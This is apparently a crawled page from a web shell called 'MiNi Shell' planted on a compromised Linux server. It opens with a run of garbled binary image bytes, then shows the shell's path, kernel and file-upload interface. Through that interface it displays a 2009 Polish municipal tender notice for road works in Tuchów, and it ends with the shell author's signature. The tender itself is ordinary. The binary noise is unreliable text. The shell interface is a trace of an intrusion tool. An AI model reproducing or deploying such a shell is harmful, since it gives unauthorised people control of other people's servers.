JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090316/63314-N-2009.html

<p class="kh_header"><b>Tuchów: Odbudowa infrastruktury drogowo- mostowej w 2009 roku - 
Odbudowa nawierzchni i korpusu ulicy Kolejowej w Tuchowie na dł. 1.100 mb , szerokość ulicy 3,0 - 5,0.</b><br>
<b>Numer ogłoszenia: 63314 - 2009; data zamieszczenia: 16.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa infrastruktury drogowo- mostowej w 2009 roku - 
Odbudowa nawierzchni i korpusu ulicy Kolejowej w Tuchowie na dł. 1.100 mb , szerokość ulicy 3,0 - 5,0..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest:

Odbudowa infrastruktury drogowo- mostowej w 2009 roku - 
Odbudowa nawierzchni i korpusu ulicy Kolejowej w Tuchowie na dł. 1.100 mb , szerokość ulicy 3,0 - 5,0.

Roboty drogowe: 
usuniecie warstwy ziemi ( humusu) za pomocą spycharek , gr. warstwy  15cm w ilości 200 m2
ręczne ścinanie i karczowanie zagajników średniej gęstości  w ilości 0,020 ha
umocnienie skarp  kanałów narzutem kamiennym - umocnienie korpusu ulicy w ilości 200 m2
umocnienie skarp płytami prefabrykowanymi o wym 80x50x10 w ilości 200 m2
podbudowa z kruszywa łamanego , warstwa dolna gr. 10 cm w ilości 525 m2
nawierzchnia z mieszanek bitumicznych grysowo- żwirowych , warstwa ścieralna o gr. 7 cm w ilości 4.400 m2..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się  wykonawcy, którzy:

1. Posiadają uprawnienia niezbędne do wykonania zamówienia, jeżeli  ustawy  nakładają  obowiązek  posiadania  takich  uprawnień. 

Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje uprawnienia do występowania  w obrocie prawnym.

Ocena  tego warunku będzie dokonana  na  podstawie:
-aktualnego  odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności 	gospodarczej, wystawionego nie wcześniej niż 6 m - cy  przed upływem terminu składania ofert.
W  przypadku  występowania  pełnomocnika  należy  dołączyć  pełnomocnictwo  dla  osób  podpisujących  ofertę  do  podejmowania  zobowiązań  w  imieniu  firmy  składającej  ofertę, o  ile  nie  wynikają  z  przepisów  prawa   lub  innych  dokumentów
2. Posiadają niezbędną wiedzę i doświadczenie  oraz  dysponują  potencjałem  technicznym  i  osobami  zdolnymi   do  wykonania  zamówienia, lub  przedstawią  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia. 
a) w  zakresie  wymaganego  doświadczenia - Zamawiający  wymaga, aby  wykonawca  wykazał  się  co  najmniej  5  robót   budowlanych podobnych  z rodzaju i zakresu co przedmiot zamówienia, a za takie  roboty  budowlane  odpowiadające rodzajowi i zakresowi co przedmiot zamówienia uznaje się wykonane  roboty w ilości  co najmniej 4.400 m2 nawierzchni bitumicznej , 525 m2 podbudowy  z klińca oraz  200 m2  umocnienia korpusu drogi płytami żelbetowymi .
Ocena  tego warunku będzie dokonana  na  podstawie:
wykaz  zrealizowanych   zamówień  publicznych  wykonanych  przez  wykonawcę  w  okresie  ostatnich  5  lat (liczy  się  data  wpisu  do  dziennika  budowy  lub  zgłoszenia  o  zakończeniu  budowy)  przed  dniem  wszczęcia postępowania  o  udzielenie  zamówienia  (ogłoszenie  w  BZP), a  jeżeli  okres  prowadzenia  działalności  jest krótszy - w tym  okresie, popartych  odpowiednimi  dokumentami, (referencje, protokoły  odbioru  końcowego, opinie  zamawiających, na  których  zamówienia  zostały  zrealizowane)  iż  przedstawione  roboty  budowlane zostały  wykonane  należycie. 
Do  każdej  pozycji  wyszczególnionej  w  załączniku  nr  5   SIWZ  należy  załączyć  dokument  potwierdzający  należyte  wykonanie  zamówienia. 
b)  w  zakresie   dysponowania   osobami  zdolnymi   do  wykonania  zamówienia.- Zamawiający  wymaga, aby  wykonawca  dysponował :
kierownikiem  budowy  posiadającym  uprawnienia  budowlane  w  specjalności  drogowej
posiadaniem  lub  dysponowaniem odpowiednią  ilością  osób  zdolnych  do  wykonania  zamówienia - w ilości nie mniejszej niż 10 osób.
W przypadku  nie dysponowania  osobami zdolnymi do wykonania zamówienia ,nie posiadania potencjału technicznego należy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia  potencjału technicznego i osób  zdolnych  do wykonania zamówienia.
Ocena tego warunku będzie dokonana w oparciu o:
wykaz osób i podmiotów , które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności ( załączyć uprawnienia  budowlane  kierownika budowy w specjalności  drogowej,  wraz z aktualnym zaświadczeniem   o przynależności  do właściwej Izby Inżynierów Budownictwa) . 
sporządzenie  wykazu  osób - podanie  personelu  technicznego , stwierdzających, że osoby,  które  będą  uczestniczyć w wykonywaniu   zamówienia , posiadają  wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. - załącznik  nr  7  SIWZ.
c) w  zakresie   dysponowania  potencjałem  technicznym - Zamawiający  wymaga, aby  wykonawca  dysponował nw sprzętem:
a) układarka do układania mieszanek mineralno - asfaltowych ,
b) równiarka  
c) spycharka
d) walcami gumowymi w ilości 2 szt  
e) samochodami  samowyładowczymi -  co najmniej 2 szt.  . 
 
Ocena tego warunku będzie dokonana w oparciu  o:  
wykaz  narzędzi, urządzeń   i sprzętu. Wymaga się aby wykonawca przedstawił  wg  załączniku nr 4  SIWZ  wymagany  rodzaj sprzętu,  potrzebny  do  wykonania  zamówienia . 
3.  Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
Przedmiotowy warunek zostanie uznany za spełniony jeżeli wykonawca przedłoży w swojej ofercie oświadczenie iż nie podlega wykluczenia z postępowania na podstawie art. 24 ustawy. Potwierdzenie spełnienia  tego warunku zostanie dokonane w oparciu o dokument o nazwie :Oświadczenie  załącznik  nr 3 będący załącznikiem do SIWZ.
4.  Nie podlega wykluczeniu z postępowania na podstawie art. 24  ust. UPzp
Ocena tego warunku zostanie dokonania w oparciu o:
- oświadczeń  zawartych  w  dokumencie  o nazwie :Oświadczenie (załącznik nr 3) złożonych w trybie  art. 22 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz  oświadczeń jakie  mają  dostarczyć  wykonawcy  w  celu  potwierdzenia  spełnienia  warunków  udziału  w  postępowaniu: Każdy  Wykonawca przystępujący do przetargu powinien złożyć oświadczenie, że:
1)  posiada uprawnienia do wykonywania  określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2) posiada  niezbędną wiedzę i doświadczenie, oraz dysponują  potencjałem  technicznym  i osobami zdolnymi do  wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
3)  znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)  nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust.1 i 2 Pzp,
Ponadto Zamawiający żąda oświadczenia, że wykonawca :
5) w  przypadku  wyboru  oferty  podpisze  umowę, której  wzór   załączono  do  specyfikacji  istotnych  warunków  zamówienia
6)  zapoznał się z terenem budowy i nie wnosił żadnych uwag
7)  udzieli co najmniej 5-letniej gwarancji na wykonane prace
8 ) pozostaje związany ofertą przez okres 30 dni
9)  wszystkie osoby skierowane  do realizacji zamówienia będą posiadać wymagane     kwalifikacje  techniczne i aktualne badania lekarskie 
10)  realizując zamówienie publiczne w ciągu ostatnich 3 lat przed wszczęciem postępowania nie   wyrządził szkody, nie wykonując zamówienia lub wykonując je z nienależytą starannością 
11) oferowane materiały spełniają wszystkie warunki zamówienia, a w szczególności    posiadają wszystkie wymagane atesty i certyfikaty.
Po zapoznaniu się z warunkami zamówienia , projektem umowy i wszystkimi załącznikami akceptuje je bez zastrzeżeń.

Wykaz  dokumentów jakie  mają  dostarczyć  wykonawcy  w  celu  potwierdzenia  spełnienia  warunków  udziału  w  postępowaniu
Od wykonawców ubiegających się o przyznanie zamówienia wymagane jest,  w celu potwierdzenia spełnienia warunków,  o których mowa w art. 22 ust. 2 ustawy, przedstawienie wymienionych niżej dokumentów. Dokumenty te, zgodnie  z obowiązującym w tym zakresie Rozporządzeniem Prezesa  Rady  Ministrów   z dnia 19  maja 2006 r. (Dz. U. z  16  października  2008 r. Nr 188, poz. 1155.), winny  być  aktualne  w  terminie  składania  ofert   i   mogą być przedstawione w formie  oryginałów  lub  poświadczonych  kopii  Za  zgodność  z  oryginałem. Potwierdzenie zgodności należy potwierdzić na każdej stronie dokumentu.
W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące oświadczenia i dokumenty :
I.wykaz oświadczeń, że wykonawca spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1  i  że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 uPzp - zgodnych z treścią załącznika nr 3 .
II.aktualnego  odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m - cy  przed upływem terminu składania ofert.
W  przypadku  wnoszenia  wspólnej  oferty  przez  wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy  dołączyć  oświadczenie  Wykonawców, że  ich  zobowiązania  co  do  wykonania  zamówienia  są   solidarne  a  także:  oświadczenia  i  dokumenty  potwierdzające  spełnienie  warunków  o  których  mowa    w  pkt. 19  i  20  SIWZ 
Każdy  z  wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia  składa  dokumenty  tak  jakby  sam  ubiegał  się  o  udzielenie  zamówienia  publicznego.
W  zakresie  dokumentów  potwierdzających  spełnienie  warunków  w  zakresie  wymaganego  doświadczenia   i  potencjału  ludzkiego  oraz  zdolności  finansowej, Zamawiający  dopuszcza  możliwość  sumowania  potencjałów  wszystkich  wykonawców  wspólnie  ubiegających  się  o  zamówienie.
Ponadto w  przypadku  Wykonawców   wspólnie  ubiegających się  o zamówienie, wykonawcy ustanawiają  pełnomocnika  do  reprezentowania  ich  w  postępowaniu  o  udzielenie  zamówienia  albo  reprezentowania    ich  w  postępowaniu i  zawarcia  umowy  w sprawie  zamówienia publicznego.
W przypadku podpisywania oferty lub poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę (y) niewymienione w dokumencie rejestracyjnym wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. 
Pełnomocnictwo powinno być przedłożone w formie oryginału  lub  notarialnie  potwierdzonej  kopii.
 Zamawiający przypomina, że dokument pełnomocnictwa , jak i jego odpis  zgodnie z przepisami ustawy z dnia 9 września 2000 o opłacie skarbowej podlegają opłacie skarbowej. 
Opłata skarbowa powinna być odprowadzona zgodnie z Rozporządzeniem Ministra Finansów z dnia 5 grudnia 2000 r. w sprawie pobierania zapłaty i zwrotu opłaty skarbowej oraz sposobu  prowadzenia rejestrów tej opłaty .
Jeżeli  oferta  wykonawców  o  których  mowa  w  art. 23  ust. 1  uPzp  zostanie  wybrana, zamawiający  przed  podpisaniem  umowy  w  sprawie  zamówienia  publicznego  zażąda  przedstawienia  umowy  regulującej   współpracę  podmiotów  występujących  wspólnie.   
III.dokumentów stwierdzających, że  osoby  które  wykonywać  będą  zamówienie  posiadają  wymagane  uprawnienia, jeżeli  ustawy  nakładają  obowiązek  posiadania  takich  uprawnień.      
                                                                        
Należy  podać  wykaz  pracowników  ,  zawierający  potwierdzenie  wymaganych  kwalifikacji  i  doświadczenia   w  wykonywaniu  zamówień  jak  w  niniejszym  postępowaniu  (załączyć  uprawnienia  budowlane  wraz  z   aktualnym  zaświadczeniem  o   przynależności  kierownika  budowy  do  właściwej  Izby  Inżynierów  Budownictwa)
IV. wykazu  osób, którymi  dysponuje  lub  będzie  dysponował  wykonawca  i  które  będą  uczestniczyć  w  wykonywaniu  zamówienia, wraz  z  informacjami  na  temat  ich  kwalifikacji  zawodowych, doświadczenia  i  wykształcenia 
   niezbędnych  do  wykonywania  zamówienia, a  także  zakresu  wykonywanych  przez   nie  czynności  ( wzór w załączeniu) 
V. pisemnego  zobowiązania  innych  podmiotów  do  udostępnienia  osób  zdolnych  do  wykonania  zamówienia  innych
podmiotów,  jeżeli  w  sporządzonym  wykazie  na  załączniku  nr  .7  do  SIWZ   wykonawca  wskazał  osoby, którymi będzie  dysponował 
VI. wykazu  wykonanych   robót  budowlanych,  w okresie  ostatnich  pięciu  lat przed  dniem  wszczęcia  postępowania   o  udzielenie  zamówienia, a  jeżeli  okres  prowadzenia  działalności  jest  krótszy - w  tym  okresie,     odpowiadających  swoim  rodzajem   i  wartością  robotom  budowlanym  stanowiącym  przedmiot  zamówienia z  podaniem  ich  wartości  oraz  daty  i  miejsca  wykonania, (liczy  się  data  wpisu  do  dziennika  budowy  lub   zgłoszenia   o  zakończeniu  budowy)  przed  dniem  wszczęcia postępowania  o  udzielenie  zamówienia  (ogłoszenie  w  BZP),  a  jeżeli  okres  prowadzenia  działalności  jest krótszy - w tym  okresie,
VII. dokumentów  potwierdzających,  że roboty  budowlane, przedstawione w  powyższym  w wykazie, zostały wykonane   z należytą starannością,
VIII. wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi posiada Wykonawca,  lub  będzie   dysponował  wykonawca, rodzaj  narzędzi,   urządzeń  i  sprzętu.               
IX.  pisemnego  zobowiązania  innych  podmiotów  do  udostępnienia  niezbędnych  do  wykonania  zamówienia  narzędzi   i  urządzeń , jeżeli  w  sporządzonym  wykazie  na  załączniku  nr  4   do  SIWZ , wykonawca  wskazał  narzędzia 
i urządzenia, którymi  będzie  dysponował
X. wskazania  przez  wykonawcę  w  załączniku  nr  6 SIWZ  tej  części  zamówienia, która  zostanie  powierzona podwykonawcom .          
Zamawiający  żąda  przedstawienia   w  swojej  ofercie  i  zakresu  powierzonych  prac  podwykonawcom  w  przypadku  ich  występowania.
Załączniki  do  formularza  ofertowego, będące  częścią  oferty, muszą  być  podpisane  bądź  przez  ww. osoby,  bądź  przez  upoważnionego  Wykonawcę (w  tym  przypadku  upoważnienie  do  podpisania  dokumentów  musi  być  bezwzględnie  dołączone  do  oferty.
Brak  jakichkolwiek z  wyżej  wymienionych  dokumentów, lub  złożenie  dokumentu  w  niewłaściwej  formie  np.  nie  poświadczenie którejkolwiek  strony  dokumentu  przez  wykonawcę  za  zgodność  z  oryginałem,    odpisy  lub  kopie, stwierdzenia  braku  podpisów  bądź  upoważnienia  do  podpisywania  dokumentów, Wykonawca  zostanie  wykluczony  i  spowoduje  odrzucenie  oferty.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument  wystawiony  nie  wcześniej    niż  6  m-cy przed  upływem  terminu  składania  ofert
nie orzeczono wobec niego zakazu ubiegania się o zamówienie - dokument  wystawiony  nie  wcześniej  niż  6  m-cy  przed  upływem  terminu  składania  ofert
nie zalega z uiszczeniem podatków, opłat,  składek na ubezpieczenie społeczne lub zdrowotne albo uzyskał przewidziane prawem zwolnienie, odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymania  w całości wykonania decyzji właściwego organu.- dokument  wystawiony  nie  wcześniej   niż  3  m-ce  przed  upływem  terminu  składania  ofert
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje  się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty, o których mowa powyżej należy złożyć w formie oryginału, odpisu, wypisu lub kopii, przetłumaczone na język polski, poświadczonych przez polskie placówki konsularne, stosownie do obowiązujących przepisów.
Dokumenty sporządzone w języku obcym, inne niż określone   powyżej  należy składać wraz z tłumaczeniem na język polski, sporządzonym przez tłumacza przysięgłego. 
 Ocena  spełnienia  warunków  wymaganych  od  wykonawców  zostanie  dokonana  wg.  Formuły    spełnia - nie spełnia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tuchow.pl/przetargi/BIP GMINY TUCHÓW/zamówienia publiczne i ogłoszenia/..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie , 33-170 Tuchów, Rynek 1 , pokój nr 1. Cena materiałów przetargowych  wynosi 30,00 złotych / wersja papierowa u Zamawiającego/..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2009 godzina 10:00, miejsce: Urząd Miejski w Tuchowie, 33-170 Tuchów, ul. Rynek 1 , pokój nr 1..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com